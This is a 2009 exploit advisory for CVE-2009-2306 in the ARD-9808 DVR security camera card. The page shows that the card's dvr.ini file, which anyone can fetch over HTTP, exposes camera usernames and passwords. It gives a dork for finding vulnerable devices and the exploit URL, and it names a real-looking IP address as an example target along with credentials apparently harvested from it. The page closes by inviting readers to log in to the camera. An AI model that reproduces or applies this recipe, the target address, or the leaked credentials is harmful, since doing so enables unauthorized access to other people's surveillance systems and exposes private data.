Bug: ARD-9808 DVR Card Security Camera Passwords View Bug (WLB-2009070007 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: ARD-9808 DVR Card Security Camera Passwords View Bug
 Credit: Septemb0x
 Date: 2009.07.04
 CWE: CWE-264 (Show similar)
 CVE: CVE-2009-2306 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
High
No
Yes

-------------------------------------------------
SoftWare Name : ARD-9808 DVR Card Security Camera Passwords View Bug
-------------------------------------------------
Author : Septemb0x
Web Site : www.ozkanbozkurt.com
Procuts Site : http://www.armassa.com.tr/shop/category.php?sid=C2B7D6B59AF75CF88011987A080A46FD&id=87789673
Software Download : http://www.armassa.com.tr/shop/down/ard9808.rar = Open To Rar > DVR > Dvr.ini
D0rk : "To enable control work: Tools->Internet Options->Security->Custom Level Reset to: Low Or
Download"
-------------------------------------------------
Exploit: http://[sitename-ipadress]/dvr.ini
-------------------------------------------------
Example: http://88.249.248.177/dvr.ini
Show;
[PASSWORD]
administrator=
password_a=
user=
password=
enable=0
user0=ozcan = Camera Username
password0=3893 = Camera Password
right0=223
encode=1
num=2
user1=yurt
password1=yurt
right1=223
.
.
.
... Login The Camera :)
-------------------------------------------------
Greetz : BHDR, BARCOD3
-------------------------------------------------

References:

http://www.milw0rm.com/exploits/9066

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com